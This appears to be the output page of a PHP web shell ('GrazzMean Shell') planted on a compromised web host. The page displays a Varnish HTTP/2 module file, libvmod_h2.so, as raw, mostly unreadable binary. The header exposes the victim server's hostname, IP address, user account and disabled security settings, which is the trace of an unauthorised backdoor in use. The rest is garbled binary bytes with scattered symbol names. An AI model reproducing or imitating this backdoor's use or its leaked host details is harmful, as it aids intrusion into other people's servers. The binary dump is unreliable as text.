shell bypass 403

GrazzMean Shell

: /lib64/varnish/vmods/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.221.185.58
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : libvmod_h2.so
ELF>�	@ 3@8	@@@ �� �  �� � 888$$     S�td     P�td888LLQ�tdR�td�� � GNUV�4CWnY�]�^�M��X`$BE���k�l�A΀�@��|�qXB!j���͐Z�b �u~�U �, F"5  �P  @�0�H  <  �0-�p
��p�__gmon_start___ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalizeH2_transportSES_Get_proto_privVRT_failVAS_Fail__stack_chk_failvmod_isvmod_rapid_resetLck__LockLck__Unlockvmod_rapid_reset_limitvmod_rapid_reset_periodvmod_rapid_reset_budgetVmod_h2_Datalibpthread.so.0libc.so.6_edata__bss_start_endlibvmod_h2.soGLIBC_2.2.5GLIBC_2.4+ui	[ii
g� �
� `
  ( �0 P8 ` H �P `X ` 
h p x � � � � � 
� � � � � � � 	� ��H��H�� H��t��H����5� �%� ��h�������h��������h�������h�������h�������h�������h��������% D���%
 D���% D���%� D���%� D���%� D���%� DH�=	 H� H9�tH�� H��t	�����H�=� H�5� H)�H��H��H��?H�H�tH�� H��t��fD�����=� u+UH�=� H��tH�=~ �Y����d����m ]������w����SH��dH�%(H�D$1�H�����?��k��H�_HH��tu�;��Q'u}H�� H9C`uXH�{0H���|������H�$H�H��H�����8K~o���H�T$dH3%(H����H��[��1���@H�5�1��:�����A�H�
��3H�5
H�=9�#���A�H�
��-H�5�H�=���A�H�
��-H�5�H�=��������A�H�
��7H�5�H�=����A�H�
��7H�5tH�=����A�H�
�6H�5OH�={�e���D��H���S���H����H�����D��ATI��UH��SH���)���H�����}H����@t	f.EzuH��[]A\�DH�CH�^H�5�H�x0�����@�Mf.�z4u2H�{H�^H�5��D$H��0�����D$H��[]A\�@��@f���H*�H��X�A�$���`���pH��[]A\�ff.�@��AUI��ATI��USH���'���H����A�<$H��H��HtsI9l$tlH�@H�_H�5�H�x0���H��HI�D$H9�t)f�H��H�H*���X�A����`H�{H�_H�5�H��0���H��H��[]A\A]�H���������ATI��UH��SH���i���H�����}H����Pt	f.EzuH��[]A\�DH�CH�`H�5�H�x0�/�����P�Mf.�z4u2H�{H�`H�5��D$H��0�����D$H��[]A\�@��Pf���H*�H��X�A�$���`����H��[]A\�ff.�@��H���s���H��t��XH���pH�����H��H���(ctx) != NULLvmod_h2.c(ctx)->magic == 0x6bb8f0db((h2)) != 0((h2))->magic == (0xa16f7e4b)vmod_h2 can only be called from client-side VCL.(ctx->req)->magic == 0x2751aaa1(SES_Get_proto_priv(ctx->req->sp, &up)) == 0vmod_rapid_reset_periodvmod_rapid_reset_limitvmod_rapid_reseth2get�6df57df5ec007ccfffcbbbc9243d91dd9fdf9894ccbd22464dac492d84f3dab1Varnish 6.0.13 a395739fa63cddec305142eabefec0a4fd5339e7h2[["$VMOD","1.0"],["$FUNC","is",[["BOOL"],"Vmod_h2_Func.is",""]],["$FUNC","rapid_reset",[["DURATION"],"Vmod_h2_Func.rapid_reset","struct vmod_rapid_reset_arg",["DURATION","threshold",null,null,true]]],["$FUNC","rapid_reset_limit",[["INT"],"Vmod_h2_Func.rapid_reset_limit","struct vmod_rapid_reset_limit_arg",["INT","number",null,null,true]]],["$FUNC","rapid_reset_period",[["DURATION"],"Vmod_h2_Func.rapid_reset_period","struct vmod_rapid_reset_period_arg",["DURATION","duration",null,null,true]]],["$FUNC","rapid_reset_budget",[["REAL"],"Vmod_h2_Func.rapid_reset_budget",""]]]/* Functions */
typedef VCL_BOOL td_h2_is(VRT_CTX);

struct vmod_rapid_reset_arg {
	char			valid_threshold;
	VCL_DURATION		threshold;
};
typedef VCL_DURATION td_h2_rapid_reset(VRT_CTX,
    struct vmod_rapid_reset_arg*);

struct vmod_rapid_reset_limit_arg {
	char			valid_number;
	VCL_INT			number;
};
typedef VCL_INT td_h2_rapid_reset_limit(VRT_CTX,
    struct vmod_rapid_reset_limit_arg*);

struct vmod_rapid_reset_period_arg {
	char			valid_duration;
	VCL_DURATION		duration;
};
typedef VCL_DURATION td_h2_rapid_reset_period(VRT_CTX,
    struct vmod_rapid_reset_period_arg*);
typedef VCL_REAL td_h2_rapid_reset_budget(VRT_CTX);

struct Vmod_h2_Func {
	td_h2_is			*is;
	td_h2_rapid_reset		*rapid_reset;
	td_h2_rapid_reset_limit		*rapid_reset_limit;
	td_h2_rapid_reset_period	*rapid_reset_period;
	td_h2_rapid_reset_budget	*rapid_reset_budget;
};
static struct Vmod_h2_Func Vmod_h2_Func;;L��hH�x�����8����8���4����p�����zRx�$X�FJw�?:*3$"D��p \��A�D �
AI�D�HOL�L��F�D�D �D0l
 AABFW
 AABED AAB8���F�E�D �A(�D0�
(D ABBAL$�����F�D�D �D0l
 AABFW
 AABED AABt0���-HV
BLGNU��
`
 �P` (�`+M�
`� � ���o`��
q� �8p�	���o���o@���o�o���o	� 	 	0	@	P	`	p	GCC: (GNU) 8.5.0 20210514 (Red Hat 8.5.0-20)GA$3a1�mGA$3p1113�
]GA*GA$annobin gcc 8.5.0 20210514GA$plugin name: annobinGA$running gcc 8.5.0 20210514GA*GA*GA!
GA*FORTIFYGA+GLIBCXX_ASSERTIONSGA*GOW*�GA*cf_protectionGA+omit_frame_pointerGA+stack_clashGA!stack_realign
GA*FORTIFY�
KGA+GLIBCXX_ASSERTIONS�
]+�	B�	]�	y�	��	��	��	��	�
K/�
�5�DK[kpk�a
���a
�-�-=!bpq!�]�]�]��	��	�	0�	O�	i�	��	��	�` (��x�`A��	� 
�`
  � 9�
E� dr
`x �� �8�  �� �	�8`��@p8	�
	�	�	
`�8� � �  � �    `�� �  �P#,  @9B0�Zdq �p
��&  �p��  �0-� �".annobin_vmod_h2.c.annobin_vmod_h2.c_end.annobin_vmod_h2.c.hot.annobin_vmod_h2.c_end.hot.annobin_vmod_h2.c.unlikely.annobin_vmod_h2.c_end.unlikely.annobin_vmod_h2.c.startup.annobin_vmod_h2.c_end.startup.annobin_vmod_h2.c.exit.annobin_vmod_h2.c_end.exit.annobin_h2get.start.annobin_h2get.endh2get__func__.10460.annobin_vmod_is.start.annobin_vmod_is.end.annobin_vmod_rapid_reset.start.annobin_vmod_rapid_reset.end__func__.10471.annobin_vmod_rapid_reset_limit.start.annobin_vmod_rapid_reset_limit.end__func__.10478.annobin_vmod_rapid_reset_period.start.annobin_vmod_rapid_reset_period.end__func__.10485.annobin_vmod_rapid_reset_budget.start.annobin_vmod_rapid_reset_budget.end.annobin_vcc_if.c.annobin_vcc_if.c_end.annobin_vcc_if.c.hot.annobin_vcc_if.c_end.hot.annobin_vcc_if.c.unlikely.annobin_vcc_if.c_end.unlikely.annobin_vcc_if.c.startup.annobin_vcc_if.c_end.startup.annobin_vcc_if.c.exit.annobin_vcc_if.c_end.exitVmod_FuncVmod_ProtoVmod_Jsonderegister_tm_clones__do_global_dtors_auxcompleted.7303__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___fini__dso_handle_DYNAMIC__GNU_EH_FRAME_HDR__TMC_END___GLOBAL_OFFSET_TABLE__initSES_Get_proto_priv_ITM_deregisterTMCloneTable_edatavmod_is__stack_chk_fail@@GLIBC_2.4VRT_failVmod_h2_DataVAS_Failvmod_rapid_reset_periodLck__LockH2_transport__gmon_start__vmod_rapid_reset_limitLck__Unlockvmod_rapid_reset__bss_startvmod_rapid_reset_budget_ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.note.gnu.property.init_array.fini_array.data.rel.ro.dynamic.got.bss.comment.gnu.build.attributes88$.���o``H8���@��qH���o*U���o@@0dpp�nB88�x��s		�~�	�	p��	�	m�``
���� �88L�����   �� ��� �� � �� ��� �x�   �0 - `0 Dx"x	Q	�+�1
© 2025 GrazzMean